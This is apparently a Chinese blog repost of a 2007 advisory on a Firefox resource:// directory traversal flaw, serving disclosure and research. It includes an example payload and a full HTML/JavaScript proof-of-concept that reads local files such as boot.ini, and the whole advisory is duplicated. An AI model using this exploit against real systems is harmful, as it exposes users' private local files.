上一篇
下一篇
Mozilla Firefox resource://远程目录遍历漏洞
作者:JiaJia 日期:2007-06-04
(Ps:晕倒,我最近喜欢用这个浏览器,速度很不错,还好我用的是2.0.0.4 ~)
受影响系统:
Mozilla Firefox <= 2.0.0.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 24191
Mozilla Firefox是一款流行的开源WEB浏览器。
Mozilla Firefox在处理服务器返回的“resource://”URL资源访问时存在漏洞,恶意网页可能利用此漏洞访问客户端系统上的文件。
Firefox中的resource:// URL协议处理器没有正确地验证某些用户输入,允许攻击者使用..%5C而不是..\绕过安全限制,将文件内容暴露为SCRIPT或CSS标签的可读属性,导致读取本地系统的任意文件。
例如,假设系统中的C:\resource.txt文件包含有:
secretinfo = “steal me”
则攻击者可以通过包含有以下内容的脚本将本地文件的内容暴露于站点:
<script src=”resource://gre/..%5C..%5Cresource.txt”></script>
<*来源:shutdown (shutdown@flashmail.com)
链接:https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=367428
http://larholm.com/2007/05/25/firefox-0day-local-file-reading/
http://ha.ckers.org/blog/20070516/read-firefox-settings-poc/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head>
<title>resource:// directory traversal testcase</title>
<script type="text/javascript"><!--
function check(path) {
var escript = document.createElement("script");
escript.src = path;
window.onerror = function(text, path, line) {
escript.parentNode.removeChild(escript);
var eresult = document.getElementById("result");
var textnode = document.createTextNode(path + ": " + text + "\n");
eresult.insertBefore(textnode, eresult.firstChild);
};
document.body.appendChild(escript);
}
//--></script>
</head>
<body>
<h1>resource:// directory traversal testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<form>
URL: <input name="path" type="text" size="80"
value="resource://gre/..%5c..%5c..%5c..%5cboot.ini">
<input type="button" value="check" onclick="check(this.form.path.value);">
</form>
<p><pre id="result"></pre></p>
</body>
</html>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Mozilla
--------------------------------------------------------------------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mozilla.org/
受影响系统:
Mozilla Firefox <= 2.0.0.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 24191
Mozilla Firefox是一款流行的开源WEB浏览器。
Mozilla Firefox在处理服务器返回的“resource://”URL资源访问时存在漏洞,恶意网页可能利用此漏洞访问客户端系统上的文件。
Firefox中的resource:// URL协议处理器没有正确地验证某些用户输入,允许攻击者使用..%5C而不是..\绕过安全限制,将文件内容暴露为SCRIPT或CSS标签的可读属性,导致读取本地系统的任意文件。
例如,假设系统中的C:\resource.txt文件包含有:
secretinfo = “steal me”
则攻击者可以通过包含有以下内容的脚本将本地文件的内容暴露于站点:
<script src=”resource://gre/..%5C..%5Cresource.txt”></script>
<*来源:shutdown (shutdown@flashmail.com)
链接:https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=367428
http://larholm.com/2007/05/25/firefox-0day-local-file-reading/
http://ha.ckers.org/blog/20070516/read-firefox-settings-poc/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head>
<title>resource:// directory traversal testcase</title>
<script type="text/javascript"><!--
function check(path) {
var escript = document.createElement("script");
escript.src = path;
window.onerror = function(text, path, line) {
escript.parentNode.removeChild(escript);
var eresult = document.getElementById("result");
var textnode = document.createTextNode(path + ": " + text + "\n");
eresult.insertBefore(textnode, eresult.firstChild);
};
document.body.appendChild(escript);
}
//--></script>
</head>
<body>
<h1>resource:// directory traversal testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<form>
URL: <input name="path" type="text" size="80"
value="resource://gre/..%5c..%5c..%5c..%5cboot.ini">
<input type="button" value="check" onclick="check(this.form.path.value);">
</form>
<p><pre id="result"></pre></p>
</body>
</html>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Mozilla
--------------------------------------------------------------------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mozilla.org/
文章来自: 
引用通告: 
Tags: 评论: 0 | 引用: 0 | 查看次数: -
发表评论